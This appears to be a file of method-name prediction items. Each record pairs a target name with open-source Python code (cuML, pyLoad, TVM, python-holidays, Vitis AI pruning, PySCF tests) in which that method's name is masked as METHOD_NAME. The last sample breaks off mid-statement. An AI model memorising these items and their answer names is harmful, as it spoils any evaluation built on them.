@pytest.mark.parametrize("cardinality", [5, 10, 50])
def test_labelencoder_transform(length, cardinality, client):
"""Try fitting and then encoding a small subset of the df"""
tmp = cudf.Series(np.random.choice(cardinality, (length,)))
df = dask_cudf.from_cudf(tmp, npartitions=len(client.has_what()))
le = LabelEncoder().fit(df)
assert le._fitted
encoded = le.transform(df)
df_arr = df.compute().to_numpy()
df_arr = METHOD_NAME(df_arr)
encoder_arr = cp.asnumpy(encoded.compute().to_numpy())
encoded_arr = METHOD_NAME(encoder_arr)
assert ((encoded_arr == encoded_arr.T) == (df_arr == df_arr.T)).all()
def test_labelencoder_unseen(client):
"""Try encoding a value that was not present during fitting"""
df = dask_cudf.from_cudf(
cudf.Series(np.random.choice(10, (10,))),
npartitions=len(client.has_what()),
)
le = LabelEncoder().fit(df)
assert le._fitted
with pytest.raises(KeyError):
tmp = dask_cudf.from_cudf(
cudf.Series([-100, -120]), npartitions=len(client.has_what())
)
le.transform(tmp).compute()
def test_labelencoder_unfitted(client):
"""Try calling `.transform()` without fitting first"""
df = dask_cudf.from_cudf(
cudf.Series(np.random.choice(10, (10,))),
npartitions=len(client.has_what()),
)
le = LabelEncoder()
with pytest.raises(NotFittedError):
le.transform(df).compute()
@pytest.mark.parametrize("use_fit_transform", [False, True])
@pytest.mark.parametrize(
"orig_label, ord_label, expected_reverted, bad_ord_label",
[
(
cudf.Series(["a", "b", "c"]),
cudf.Series([2, 1, 2, 0]),
cudf.Series(["c", "b", "c", "a"]),
cudf.Series([-1, 1, 2, 0]),
),
(
cudf.Series(["Tokyo", "Paris", "Austin"]),
cudf.Series([0, 2, 0]),
cudf.Series(["Austin", "Tokyo", "Austin"]),
cudf.Series([0, 1, 2, 3]),
),
(
cudf.Series(["a", "b", "c1"]),
cudf.Series([2, 1]),
cudf.Series(["c1", "b"]),
cudf.Series([0, 1, 2, 3]),
),
(
cudf.Series(["1.09", "0.09", ".09", "09"]),
cudf.Series([0, 1, 2, 3]),
cudf.Series([".09", "0.09", "09", "1.09"]),
cudf.Series([0, 1, 2, 3, 4]),
),
],
)
def test_inverse_transform(
orig_label,
ord_label,
expected_reverted,
bad_ord_label,
use_fit_transform,
client,
):
n_workers = len(client.has_what())
orig_label = dask_cudf.from_cudf(orig_label, npartitions=n_workers)
ord_label = dask_cudf.from_cudf(ord_label, npartitions=n_workers)
expected_reverted = dask_cudf.from_cudf(
expected_reverted, npartitions=n_workers
)
bad_ord_label = dask_cudf.from_cudf(bad_ord_label, npartitions=n_workers)
# prepare LabelEncoder
le = LabelEncoder()
if use_fit_transform:
le.fit_transform(orig_label)
else:
le.fit(orig_label)
assert le._fitted is True
# test if inverse_transform is correct
reverted = le.inverse_transform(ord_label)
reverted = reverted.compute().reset_index(drop=True)
expected_reverted = expected_reverted.compute()
assert len(reverted) == len(expected_reverted)
assert len(reverted) == len(reverted[reverted == expected_reverted])
# test if correctly raies ValueError
with pytest.raises(ValueError, match="y contains previously unseen label"):
le.inverse_transform(bad_ord_label).compute()
def test_unfitted_inverse_transform(client):
"""Try calling `.inverse_transform()` without fitting first"""
tmp = cudf.Series(np.random.choice(10, (10,)))
df = dask_cudf.from_cudf(tmp, npartitions=len(client.has_what()))
le = LabelEncoder()
with pytest.raises(NotFittedError):
le.transform(df)
@pytest.mark.parametrize(
"empty, ord_label", [(cudf.Series([]), cudf.Series([2, 1]))]
)
def test_empty_input(empty, ord_label, client):
# prepare LabelEncoder
n_workers = len(client.has_what())
empty = dask_cudf.from_cudf(empty, npartitions=n_workers)
ord_label = dask_cudf.from_cudf(ord_label, npartitions=n_workers)
le = LabelEncoder()
le.fit(empty)
assert le._fitted is True
# test if correctly raies ValueError
with pytest.raises(ValueError, match="y contains previously unseen label"):
le.inverse_transform(ord_label).compute()
# check fit_transform()
le = LabelEncoder()
transformed = le.fit_transform(empty).compute()
assert le._fitted is True
assert len(transformed) == 0
def test_masked_encode(client):
n_workers = len(client.has_what())
df = cudf.DataFrame(
{
"filter_col": [1, 1, 2, 3, 1, 1, 1, 1, 6, 5],
"cat_col": ["a", "b", "c", "d", "a", "a", "a", "c", "b", "c"],
}
)
ddf = dask_cudf.from_cudf(df, npartitions=n_workers)
ddf_filter = ddf[ddf["filter_col"] == 1]
filter_encoded = LabelEncoder().fit_transform(ddf_filter["cat_col"])
ddf_filter = ddf_filter.assign(filter_encoded=filter_encoded.values)
encoded_filter = LabelEncoder().fit_transform(ddf["cat_col"])
ddf = ddf.assign(encoded_filter=encoded_filter.values)
ddf = ddf[ddf.filter_col == 1]
assert (ddf.encoded_filter == ddf_filter.filter_encoded).compute().all() | null |
current theme id | # -*- coding: utf-8 -*-
import json
from functools import wraps
from urllib.parse import unquote, urljoin, urlparse
import flask
import flask_themes2
from pyload.core.api import Perms, Role, has_permission
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
try:
return dict(obj)
except TypeError:
pass
return super().default(obj)
try:
JSONProviderBase = flask.json.provider.JSONProvider
except AttributeError:
pass
else:
class JSONProvider(JSONProviderBase):
def dumps(self, obj, **kwargs):
return json.dumps(obj, **kwargs, cls=JSONEncoder)
def loads(self, s, **kwargs):
return json.loads(s, **kwargs)
#: Checks if location belongs to same host address
def is_safe_url(location):
ref_url = urlparse(flask.request.host_url)
test_url = urlparse(urljoin(flask.request.host_url, location))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def get_redirect_url(fallback=None):
login_url = urljoin(flask.request.url_root, flask.url_for('app.login'))
request_url = unquote(flask.request.url)
for location in flask.request.values.get("next"), flask.request.referrer:
if not location:
continue
if location in (request_url, login_url): # don't redirect to same location
continue
if is_safe_url(location):
return location
return fallback
def render_base(messages):
return render_template("base.html", messages=messages)
def clear_session(session=flask.session, permanent=True):
session.permanent = bool(permanent)
session.clear()
# session.modified = True
def METHOD_NAME():
api = flask.current_app.config["PYLOAD_API"]
return api.get_config_value("webui", "theme").lower()
#: tries to serve the file from the static directory of the current theme otherwise fallback to builtin one
def static_file_url(filename):
themeid = METHOD_NAME()
try:
url = flask_themes2.static_file_url(themeid, filename)
except KeyError:
url = flask.url_for("static", filename=filename)
return url
def theme_template(filename):
return flask.url_for("app.render", filename=filename)
#: tries to render the template of the current theme otherwise fallback to builtin template
def render_template(template, **context):
themeid = METHOD_NAME()
return flask_themes2.render_theme_template(themeid, template, **context)
def parse_permissions(session=flask.session):
perms = {x.name: False for x in Perms}
perms["ADMIN"] = False
perms["is_admin"] = False
if not session.get("authenticated", False):
return perms
perms["ANY"] = True
if session.get("role") == Role.ADMIN:
for key in perms.keys():
perms[key] = True
elif session.get("perms"):
p = session.get("perms")
perms.update(get_permission(p))
return perms
def permlist():
return [x.name for x in Perms if x.name != "ANY"]
def get_permission(userperms):
"""
Returns a dict with permission key.
:param userperms: permission bits
"""
return {
name: has_permission(userperms, getattr(Perms, name).value)
for name in permlist()
}
def set_permission(perms):
"""
generates permission bits from dictionary.
:param perms: dict
"""
permission = 0
for name in permlist():
if name.startswith("_"):
continue
if name in perms and perms[name]:
permission |= getattr(Perms, name)
return permission
def set_session(user_info, session=flask.session, permanent=True):
session.permanent = bool(permanent)
session.update(
{
"authenticated": True,
"id": user_info["id"],
"name": user_info["name"],
"role": user_info["role"],
"perms": user_info["permission"],
"template": user_info["template"],
}
)
# session.modified = True
return session
# TODO: Recheck...
def parse_userdata(session=flask.session):
return {
"name": session.get("name", "Anonymous"),
"is_admin": session.get("role", 1) == 0,
"is_authenticated": session.get("authenticated", False),
}
def apiver_check(func):
# if no apiver is provided assumes latest
@wraps(func)
def wrapper(*args, **kwargs):
api = flask.current_app.config["PYLOAD_API"]
core_apiver = api.__version__
if int(kwargs.get("apiver", core_apiver).strip("v")) < core_apiver:
return "Obsolete API", 404
return func(*args, **kwargs)
return wrapper
def is_authenticated(session=flask.session):
api = flask.current_app.config["PYLOAD_API"]
user = session.get("name")
authenticated = session.get("authenticated")
return authenticated and api.user_exists(user)
def login_required(perm):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
s = flask.session
#: already authenticated?
if is_authenticated(s):
perms = parse_permissions(s)
if perm not in perms or not perms[perm]:
response = "Forbidden", 403
else:
response = func(*args, **kwargs)
else:
clear_session(s)
if flask.request.headers.get("X-Requested-With") == "XMLHttpRequest":
response = "Forbidden", 403
else:
location = flask.url_for(
"app.login",
next=flask.request.url
)
response = flask.redirect(location)
return response
return wrapper
return decorator | null |
build conv2d | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test conv2d HVX intrinsic implementation"""
import numpy as np
import tvm
import tvm.contrib.hexagon
from tvm.topi.testing import conv2d_nhwc_python
from ..infrastructure import get_hexagon_target
def METHOD_NAME(target):
"""Build and the return the conv2d module that calls the intrinsic implementation"""
act_n, act_h, act_w, act_c = (
tvm.te.var("act_n"),
tvm.te.var("act_h"),
tvm.te.var("act_w"),
tvm.te.var("act_c"),
)
filt_h, filt_w, filt_o = tvm.te.var("filt_h"), tvm.te.var("fw"), tvm.te.var("filt_o")
off_l, off_t = tvm.te.var("off_l"), tvm.te.var("off_t")
stride_h, stride_w = tvm.te.var("stride_h"), tvm.te.var("stride_w")
act_flat = tvm.te.placeholder(
shape=(act_n, act_h, act_w, act_c), dtype="float16", name="act_flat"
)
wgt_flat = tvm.te.placeholder(
shape=(filt_h, filt_w, act_c, filt_o), dtype="float16", name="wgt_flat"
)
out_flat = tvm.te.extern(
shape=(act_n, (act_h - filt_h) // stride_h + 1, (act_w - filt_w) // stride_w + 1, filt_o),
inputs=[act_flat, wgt_flat],
fcompute=lambda ins, outs: tvm.tir.call_cpacked(
"conv2d_packed_fp16", # Function from TVM runtime
ins[0],
ins[1],
off_t,
off_l,
stride_h,
stride_w,
outs[0],
tvm.runtime.const(0), # resource_handle (unused)
),
dtype="float16",
)
s = tvm.te.create_schedule(out_flat.op)
func_name = "extern_conv"
with tvm.transform.PassContext(opt_level=3):
module = tvm.build(
s,
[act_flat, wgt_flat, off_t, off_l, stride_h, stride_w, out_flat],
target=target,
name=func_name,
)
return module
def gen_config(params):
"""Utility function to generate useful ids for shape_parameters"""
dims = lambda vals: "x".join(map(str, vals))
config = {}
for param in params:
act_shape, wgt_shape, inp_stride = param
name = f"nhwc{dims(act_shape)}-hwio{dims(wgt_shape)}-stride{dims(inp_stride)}"
config[name] = param
return config
class TestConv2dIntrin:
"""Test Conv2d Intrin class"""
shape_parameters = [
(
(1, 8, 4, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 10, 14, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 14, 6, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 14, 6, 3),
(3, 3, 3, 64),
(1, 1),
),
(
(1, 14, 6, 3),
(5, 5, 3, 3),
(1, 1),
),
(
(1, 8, 8, 3),
(2, 2, 3, 3),
(1, 1),
),
(
(1, 14, 6, 64),
(3, 3, 64, 3),
(1, 1),
),
(
(1, 4, 4, 40),
(3, 3, 40, 3),
(1, 1),
),
(
(1, 4, 4, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 5, 5, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 6, 6, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 7, 7, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 8, 8, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 8, 8, 3),
(5, 5, 3, 3),
(1, 1),
),
(
(1, 8, 8, 64),
(2, 2, 64, 64),
(1, 1),
),
(
(1, 8, 4, 3),
(3, 3, 3, 3),
(2, 2),
),
(
(1, 14, 6, 3),
(3, 3, 3, 64),
(2, 2),
),
(
(1, 14, 6, 3),
(5, 5, 3, 3),
(2, 2),
),
(
(1, 8, 8, 3),
(2, 2, 3, 3),
(2, 2),
),
]
config = gen_config(shape_parameters)
act_shape, wgt_shape, inp_stride = tvm.testing.parameters(*config.values(), ids=config.keys())
inp_offset = tvm.testing.parameter((0, 0), ids=["offset0x0"])
@tvm.testing.requires_hexagon
def test_conv2d(self, act_shape, wgt_shape, inp_stride, inp_offset, hexagon_session):
"""Test conv2d intrinsic implementation"""
assert act_shape[3] == wgt_shape[2]
# Currently, input offset does not affect the output shape
def get_out_shape(ash, wsh, inp_stride):
assert ash[3] == wsh[2]
osh = (
ash[0],
(ash[1] - wsh[0]) // inp_stride[0] + 1,
(ash[2] - wsh[1]) // inp_stride[1] + 1,
wsh[3],
)
assert tvm.tir.all([x > 0 for x in osh])
return osh
act = np.random.rand(*act_shape).astype("float16")
wgt = np.random.rand(*wgt_shape).astype("float16")
module = METHOD_NAME(get_hexagon_target("v68"))
mod = hexagon_session.load_module(module)
output = tvm.nd.array(
np.zeros(get_out_shape(act_shape, wgt_shape, inp_stride), dtype="float16"),
device=hexagon_session.device,
)
mod(
tvm.nd.array(act, device=hexagon_session.device),
tvm.nd.array(wgt, device=hexagon_session.device),
inp_offset[0], # off_t
inp_offset[1], # off_l
inp_stride[0], # stride_height
inp_stride[1], # stride_width
output,
)
out = output.numpy()
# Generate reference output and compare:
ref_out = conv2d_nhwc_python(
act.astype("float32"), wgt.astype("float32"), stride=inp_stride, padding="VALID"
).astype("float16")
tvm.testing.assert_allclose(out, ref_out, rtol=5e-2, atol=5e-2)
if __name__ == "__main__":
tvm.testing.main() | null |
test l10n uk | # python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Authors: dr-prodigy <[email protected]> (c) 2017-2023
# ryanss <[email protected]> (c) 2014-2017
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from holidays.countries.slovenia import Slovenia, SI, SVN
from tests.common import TestCase
class TestSlovenia(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass(Slovenia, years=range(1991, 2050))
def test_country_aliases(self):
self.assertCountryAliases(Slovenia, SI, SVN)
def test_no_holidays(self):
self.assertNoHolidays(Slovenia(years=1990))
def test_special_holidays(self):
self.assertHoliday(
# Solidarity Day
"2023-08-14",
)
def test_new_years_day(self):
name = "novo leto"
self.assertHolidayName(name, (f"{year}-01-01" for year in range(1991, 2050)))
self.assertHolidayName(name, (f"{year}-01-02" for year in range(1991, 2013)))
self.assertHolidayName(name, (f"{year}-01-02" for year in range(2017, 2050)))
self.assertNoHoliday(f"{year}-01-02" for year in range(2013, 2017))
def test_preserens_day(self):
self.assertHolidayName("Prešernov dan", (f"{year}-02-08" for year in range(1991, 2050)))
def test_easter_monday(self):
self.assertHolidayName(
"Velikonočni ponedeljek",
"2019-04-22",
"2020-04-13",
"2021-04-05",
"2022-04-18",
"2023-04-10",
)
def test_uprising_against_occupation_day(self):
self.assertHolidayName(
"dan upora proti okupatorju", (f"{year}-04-27" for year in range(1991, 2050))
)
def test_labor_day(self):
self.assertHolidayName("praznik dela", (f"{year}-05-01" for year in range(1991, 2050)))
self.assertHolidayName("praznik dela", (f"{year}-05-02" for year in range(1991, 2050)))
def test_statehood_day(self):
self.assertHolidayName("dan državnosti", (f"{year}-06-25" for year in range(1991, 2050)))
def test_assumption_day(self):
self.assertHolidayName(
"Marijino vnebovzetje", (f"{year}-08-15" for year in range(1991, 2050))
)
def test_reformation_day(self):
name = "dan reformacije"
self.assertHolidayName(name, (f"{year}-10-31" for year in range(1992, 2050)))
self.assertNoHoliday("1991-10-31")
self.assertNoHolidayName(name, 1991)
def test_all_saints_day(self):
self.assertHolidayName(
"dan spomina na mrtve", (f"{year}-11-01" for year in range(1991, 2050))
)
def test_christmas_day(self):
self.assertHolidayName("Božič", (f"{year}-12-25" for year in range(1991, 2050)))
def test_independence_and_unity_day(self):
self.assertHolidayName(
"dan samostojnosti in enotnosti", (f"{year}-12-26" for year in range(1991, 2050))
)
def test_l10n_default(self):
self.assertLocalizedHolidays(
("2022-01-01", "novo leto"),
("2022-01-02", "novo leto"),
("2022-02-08", "Prešernov dan"),
("2022-04-18", "Velikonočni ponedeljek"),
("2022-04-27", "dan upora proti okupatorju"),
("2022-05-01", "praznik dela"),
("2022-05-02", "praznik dela"),
("2022-06-25", "dan državnosti"),
("2022-08-15", "Marijino vnebovzetje"),
("2022-10-31", "dan reformacije"),
("2022-11-01", "dan spomina na mrtve"),
("2022-12-25", "Božič"),
("2022-12-26", "dan samostojnosti in enotnosti"),
)
def test_l10n_en_us(self):
self.assertLocalizedHolidays(
"en_US",
("2022-01-01", "New Year's Day"),
("2022-01-02", "New Year's Day"),
("2022-02-08", "Preseren's Day"),
("2022-04-18", "Easter Monday"),
("2022-04-27", "Day of Uprising Against Occupation"),
("2022-05-01", "Labor Day"),
("2022-05-02", "Labor Day"),
("2022-06-25", "Statehood Day"),
("2022-08-15", "Assumption Day"),
("2022-10-31", "Reformation Day"),
("2022-11-01", "Remembrance Day"),
("2022-12-25", "Christmas Day"),
("2022-12-26", "Independence and Unity Day"),
)
def METHOD_NAME(self):
self.assertLocalizedHolidays(
"uk",
("2022-01-01", "Новий рік"),
("2022-01-02", "Новий рік"),
("2022-02-08", "День Прешерена"),
("2022-04-18", "Великодній понеділок"),
("2022-04-27", "День спротиву окупантам"),
("2022-05-01", "День праці"),
("2022-05-02", "День праці"),
("2022-06-25", "День державності"),
("2022-08-15", "Внебовзяття Пресвятої Діви Марії"),
("2022-10-31", "День Реформації"),
("2022-11-01", "День памʼяті померлих"),
("2022-12-25", "Різдво Христове"),
("2022-12-26", "День незалежності та єднання"),
) | null |
export sparse model | # MIT License
#
# Copyright (c) 2023 Advanced Micro Devices, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import copy
import torch
from nndct_shared.pruning import logging
from nndct_shared.pruning import errors
from pytorch_nndct.nn.modules.sparse_ops import SparseConv2d, SparseLinear
from pytorch_nndct.pruning import utils
from pytorch_nndct.utils import module_util as mod_util
class SparsePruner(object):
"""Implements Sparse pruning at the module level."""
def __init__(self, model, inputs):
"""Concrete example:
```python
inputs = torch.randn([1, 3, 224, 224], dtype=torch.float32).cuda()
model = MyModel()
sparse_pruner = SparsePruner(model, inputs)
sparse_model = sparse_pruner.sparse_model(w_sparsity=0.5,a_sparsity=0,block_size=16)
```
Arguments:
model (Module): Model to be pruned.
input_specs(tuple or list): The specifications of model inputs.
"""
if isinstance(model, torch.nn.DataParallel):
raise errors.OptimizerDataParallelNotAllowedError(
'DataParallel object is not allowed.')
self._model = model
self._inputs = inputs
self._to_update_dict_list = [] # all module need to replace
self._block_size = 16
self._graph = utils.parse_to_graph(model, inputs)
def sparse_model(self,
w_sparsity=0.5,
a_sparsity=0,
block_size=16,
excludes=None):
assert w_sparsity in [0, 0.5, 0.75]
assert a_sparsity in [0, 0.5]
if a_sparsity == 0:
if w_sparsity not in [0, 0.5, 0.75]:
raise ValueError(
('When a_sparsity is 0, w_sparsity must be in ({})').format(
[0, 0.5, 0.75]))
elif a_sparsity == 0.5:
if w_sparsity != 0.75:
raise ValueError(('When a_sparsity is 0.5, w_sparsity must be 0.75'))
self._block_size = block_size
self.sparse_config = {
'w_sparsity': w_sparsity,
'a_sparsity': a_sparsity,
'block_size': self._block_size
}
logging.info('sparse_config:')
logging.info(self.sparse_config)
if w_sparsity == a_sparsity == 0:
return self._model
logging.info('replace module to sparse module')
# find all nn.Conv2d \ nn.Linear export excluded module
model = copy.deepcopy(self._model)
excluded_nodes = self._get_exclude_nodes(excludes) if excludes else []
# first_conv_nodes, last_conv_nodes = pruning_lib.find_leaf_node(self._graph)
excluded_module_list = []
for excluded_node in list(set(excluded_nodes)):
excluded_module = mod_util.module_name_from_node(excluded_node)
excluded_module_list.append(excluded_module)
for n, m in model.named_modules():
to_update_dict = {}
if isinstance(m, (torch.nn.Conv2d, torch.nn.Linear)):
if n in excluded_module_list:
logging.info('excluded module:')
logging.info(n)
logging.info(m)
elif isinstance(
m, torch.nn.Conv2d) and (m.in_channels / m.groups % 16 != 0 or
m.out_channels % 8 != 0): # for group conv
logging.warn((
'Skipping module ({}) of {} in_channels, {} out_channels, {} groups for sparsity pruning.'
).format(m, m.in_channels, m.out_channels, m.groups))
elif isinstance(m, torch.nn.Linear) and ((m.out_features % 8) != 0 or
(m.in_features % 16) != 0):
logging.warn((
'Skipping module ({}) of {} in_features, {} out_features for sparsity pruning.'
).format(m, m.in_features, m.out_features))
else:
to_update_dict[n] = m
self._to_update_dict_list.append(to_update_dict)
logging.info('replace module list:')
for i in (self._to_update_dict_list):
logging.info(i)
# replace all nn.Conv2d \ nn.Linear and reload ckpt
for idx, to_update_dict in enumerate(self._to_update_dict_list):
for name, sub_module in to_update_dict.items():
if isinstance(sub_module, torch.nn.Conv2d):
sparse_modules = SparseConv2d(
sub_module.in_channels,
sub_module.out_channels,
sub_module.kernel_size,
sub_module.stride,
sub_module.padding,
sub_module.dilation,
sub_module.groups,
bias=True if sub_module.bias is not None else False,
**self.sparse_config)
elif isinstance(sub_module, torch.nn.Linear):
sparse_modules = SparseLinear(
sub_module.in_features,
sub_module.out_features,
bias=True if sub_module.bias is not None else False,
**self.sparse_config)
mod_util.replace_modules(model, name, sparse_modules, copy_ckpt=True)
return model
def METHOD_NAME(self, model):
if isinstance(model, (torch.nn.DataParallel, torch.nn.parallel.DataParallel,
torch.nn.parallel.DistributedDataParallel)):
model = model.module
sparse_model = copy.deepcopy(model)
for n, m in model.named_modules():
if isinstance(m, (SparseConv2d, SparseLinear)):
if isinstance(m, SparseConv2d):
nn_modules = torch.nn.Conv2d(
m.conv.in_channels,
m.conv.out_channels,
m.conv.kernel_size,
m.conv.stride,
m.conv.padding,
m.conv.dilation,
m.conv.groups,
bias=True if m.conv.bias is not None else False)
elif isinstance(m, SparseLinear):
nn_modules = torch.nn.Linear(
m.linear.in_features,
m.linear.out_features,
bias=True if m.linear.bias is not None else False)
mod_util.replace_modules(sparse_model, n, nn_modules, copy_ckpt=True)
return sparse_model
def _get_exclude_nodes(self, excludes):
return utils.excluded_node_names(self._model, self._graph, excludes) | null |
tear down module | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from functools import reduce
import numpy
from pyscf import gto
from pyscf import scf
from pyscf import ao2mo
from pyscf import mcscf
from pyscf import fci
from pyscf.fci import fci_slow
def setUpModule():
global mol, m, h1e, g2e, ci0, ci1
global norb, nelec
mol = gto.Mole()
mol.verbose = 0
mol.output = None#"out_h2o"
mol.atom = [
['H', ( 1.,-1. , 0. )],
['H', ( 0.,-1. ,-1. )],
['H', ( 0.,-0.5 ,-0. )],
['H', ( 0.,-0. ,-1. )],
['H', ( 1.,-0.5 , 0. )],
['H', ( 0., 1. , 1. )],
]
mol.basis = {'H': '6-31g'}
mol.build()
m = scf.RHF(mol)
m.conv_tol = 1e-15
m.conv_tol_grad = 1e-7
ehf = m.scf()
norb = m.mo_coeff.shape[1]
nelec = mol.nelectron
h1e = reduce(numpy.dot, (m.mo_coeff.T, m.get_hcore(), m.mo_coeff)).round(9)
g2e = ao2mo.incore.general(m._eri, (m.mo_coeff,)*4, compact=False).round(9)
na = fci.cistring.num_strings(norb, nelec//2)
numpy.random.seed(15)
ci0 = numpy.random.random((na,na))
ci0 = ci0 + ci0.T
ci0 /= numpy.linalg.norm(ci0)
ci1 = numpy.random.random((na,na))
ci1 = ci1 + ci1.T
ci1 /= numpy.linalg.norm(ci1)
def METHOD_NAME():
global mol, m, h1e, g2e, ci0, ci1
del mol, m, h1e, g2e, ci0, ci1
class KnownValues(unittest.TestCase):
def test_contract(self):
ci1 = fci.direct_spin0.contract_1e(h1e, ci0, norb, nelec)
ci1ref = fci.direct_spin1.contract_1e(h1e, ci0, norb, nelec)
self.assertTrue(numpy.allclose(ci1ref, ci1))
self.assertAlmostEqual(numpy.linalg.norm(ci1), 9.1191973750140729, 7)
ci1 = fci.direct_spin0.contract_2e(g2e, ci0, norb, nelec)
ci1ref = fci.direct_spin1.contract_2e(g2e, ci0, norb, nelec)
self.assertTrue(numpy.allclose(ci1ref, ci1))
self.assertAlmostEqual(numpy.linalg.norm(ci1), 15.076640155228787, 7)
def test_kernel(self):
e, c = fci.direct_spin0.kernel(h1e, g2e, norb, nelec)
self.assertAlmostEqual(e, -9.1491239851241737, 7)
e = fci.direct_spin0.energy(h1e, g2e, c, norb, nelec)
self.assertAlmostEqual(e, -9.1491239851241737, 7)
def test_rdm1(self):
dm1ref = fci.direct_spin1.make_rdm1(ci0, norb, nelec)
dm1 = fci.direct_spin0.make_rdm1(ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.7059849569286722, 10)
norb1 = nelec
na = fci.cistring.num_strings(norb1, nelec//2)
ci1 = numpy.random.random((na,na))
ci1 = ci1 + ci1.T
dm1 = fci.direct_spin0.make_rdm1(ci1, norb1, nelec)
ref1 = fci_slow.make_rdm1(ci1, norb1, nelec)
self.assertAlmostEqual(abs(ref1-dm1).max(), 0, 10)
def test_rdm12(self):
dm1ref, dm2ref = fci.direct_spin1.make_rdm12(ci0, norb, nelec)
dm1, dm2 = fci.direct_spin0.make_rdm12(ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertTrue(numpy.allclose(dm2ref, dm2))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.7059849569286731, 10)
self.assertAlmostEqual(numpy.linalg.norm(dm2), 7.8811473403497736, 10)
norb1 = nelec
na = fci.cistring.num_strings(norb1, nelec//2)
ci1 = numpy.random.random((na,na))
ci1 = ci1 + ci1.T
dm1, dm2 = fci.direct_spin0.make_rdm12(ci1, norb1, nelec)
ref1, ref2 = fci_slow.make_rdm12(ci1, norb1, nelec)
self.assertAlmostEqual(abs(ref1-dm1).max(), 0, 10)
self.assertAlmostEqual(abs(ref2-dm2).max(), 0, 10)
def test_trans_rdm1(self):
dm1ref = fci.direct_spin1.trans_rdm1(ci0, ci1, norb, nelec)
dm1 = fci.direct_spin0.trans_rdm1(ci0, ci1, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.5485017426647461, 10)
dm0 = fci.direct_spin0.make_rdm1(ci0, norb, nelec)
dm1 = fci.direct_spin0.trans_rdm1(ci0, ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm1, dm0))
def test_trans_rdm12(self):
dm1ref, dm2ref = fci.direct_spin1.trans_rdm12(ci0, ci1, norb, nelec)
dm1, dm2 = fci.direct_spin0.trans_rdm12(ci0, ci1, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertTrue(numpy.allclose(dm2ref, dm2))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.5485017426647461, 10)
self.assertAlmostEqual(numpy.linalg.norm(dm2), 7.7327573770739235, 10)
_,dm0 = fci.direct_spin0.make_rdm12(ci0, norb, nelec)
_,dm2 = fci.direct_spin0.trans_rdm12(ci0, ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm2,dm0))
def test_davidson_only(self):
x = 3.0 * 0.529177249
y = (2.54 - 0.46 * 3.0) * 0.529177249
mol = gto.M(
verbose = 0,
atom = [
['Be',( 0., 0. , 0. )],
['H', ( x, -y , 0. )],
['H', ( x, y , 0. )],],
symmetry = True,
basis = '6-311g')
mf = scf.RHF(mol)
mf.run(conv_tol=1e-10)
mf._scf = mf
h1e = mcscf.casci.h1e_for_cas(mf, mf.mo_coeff, ncas=2, ncore=2)[0]
eri = ao2mo.incore.full(mf._eri, mf.mo_coeff[:,2:4])
cis = fci.direct_spin0.FCISolver(mol)
cis.davidson_only = True
ci0 = numpy.zeros((2,2))
ci0[0,0] = 1
e, c = cis.kernel(h1e, eri, 2, 2, ci0)
self.assertAlmostEqual(e, -0.80755526695538049, 7)
cis = fci.direct_spin0_symm.FCISolver(mol)
cis.wfnsym = 5
self.assertRaises(RuntimeError,
